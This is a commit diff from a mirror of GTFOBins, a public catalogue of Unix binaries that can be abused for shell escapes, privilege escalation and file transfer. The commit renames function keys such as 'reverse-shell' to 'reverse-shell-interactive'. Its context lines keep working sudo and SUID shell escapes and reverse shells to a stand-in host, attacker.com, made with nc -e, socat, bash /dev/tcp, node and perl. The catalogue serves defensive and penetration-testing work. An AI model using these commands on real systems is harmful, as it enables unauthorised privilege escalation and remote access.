mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-23 21:44:44 +01:00
Reorganize function names
This commit is contained in:
parent
2d3ebbbb05
commit
36dcf7a836
@ -1,9 +1,9 @@
|
||||
exec-interactive:
|
||||
label: Interactive
|
||||
execute-interactive:
|
||||
label: Interactive execute
|
||||
description: It executes interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
exec-non-interactive:
|
||||
label: Non-interactive
|
||||
execute-non-interactive:
|
||||
label: Non-interactive execute
|
||||
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
suid-enabled:
|
||||
@ -26,18 +26,14 @@ upload:
|
||||
label: Upload
|
||||
description: It can exfiltrate files on the network.
|
||||
|
||||
bind-shell:
|
||||
label: Bind shell
|
||||
bind-shell-interactive:
|
||||
label: Interactive bind shell
|
||||
description: It can bind a shell to a local port to allow remote network access.
|
||||
|
||||
reverse-shell:
|
||||
label: Reverse shell
|
||||
reverse-shell-interactive:
|
||||
label: Interactive reverse shell
|
||||
description: It can send back a reverse shell to a listening attacker to open a remote network access.
|
||||
|
||||
load-library:
|
||||
label: Library load
|
||||
description: It loads shared libraries that may be used to run code in the binary execution context.
|
||||
|
||||
bind-shell-non-interactive:
|
||||
label: Non-interactive bind shell
|
||||
description: It can bind a non-interactive shell to a local port to allow remote network access.
|
||||
@ -45,3 +41,7 @@ bind-shell-non-interactive:
|
||||
reverse-shell-non-interactive:
|
||||
label: Non-interactive reverse shell
|
||||
description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
|
||||
|
||||
load-library:
|
||||
label: Library load
|
||||
description: It loads shared libraries that may be used to run code in the binary execution context.
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: ash
|
||||
sudo-enabled:
|
||||
- code: sudo ash
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: bash
|
||||
sudo-enabled:
|
||||
- code: sudo bash
|
||||
@ -34,7 +34,7 @@ functions:
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: csh
|
||||
sudo-enabled:
|
||||
- code: sudo csh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: dash
|
||||
sudo-enabled:
|
||||
- code: sudo dash
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: env /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo env /bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
sudo-enabled:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: ionice /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo ionice /bin/sh
|
||||
|
@ -7,7 +7,7 @@ description: |
|
||||
/lib64/ld-linux-x86-64.so.2
|
||||
```
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: /lib/ld.so /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
|
@ -14,13 +14,13 @@ functions:
|
||||
LPORT=12345
|
||||
LFILE=where_to_save
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
bind-shell:
|
||||
bind-shell-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
sudo-enabled:
|
||||
@ -9,7 +9,7 @@ functions:
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -20,7 +20,7 @@ functions:
|
||||
sh.stdout.pipe(this);
|
||||
sh.stderr.pipe(this);
|
||||
});'
|
||||
bind-shell:
|
||||
bind-shell-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
suid-enabled:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
execute-non-interactive:
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'system(getenv("CMD"));'
|
||||
@ -39,7 +39,7 @@ functions:
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: python2 -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
||||
@ -22,7 +22,7 @@ functions:
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||
@ -22,7 +22,7 @@ functions:
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: ruby -e 'exec "/bin/sh"'
|
||||
sudo-enabled:
|
||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||
@ -9,7 +9,7 @@ functions:
|
||||
code: |
|
||||
export LPORT=8888
|
||||
ruby -run -e httpd . -p $LPORT
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
execute-non-interactive:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="id"
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo setarch $(arch) /bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sftp $HOST
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
||||
bind-shell:
|
||||
bind-shell-interactive:
|
||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- description: Reconnecting may help bypassing restricted shells.
|
||||
code: ssh localhost /bin/bash --noprofile --norc
|
||||
download:
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: strace -o /dev/null /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: taskset 1 /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@ -8,7 +8,7 @@ functions:
|
||||
telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: vi -c ':!/bin/sh'
|
||||
- code: |
|
||||
vi
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: zsh
|
||||
sudo-enabled:
|
||||
- code: sudo zsh
|
||||
|
Loading…
Reference in New Issue
Block a user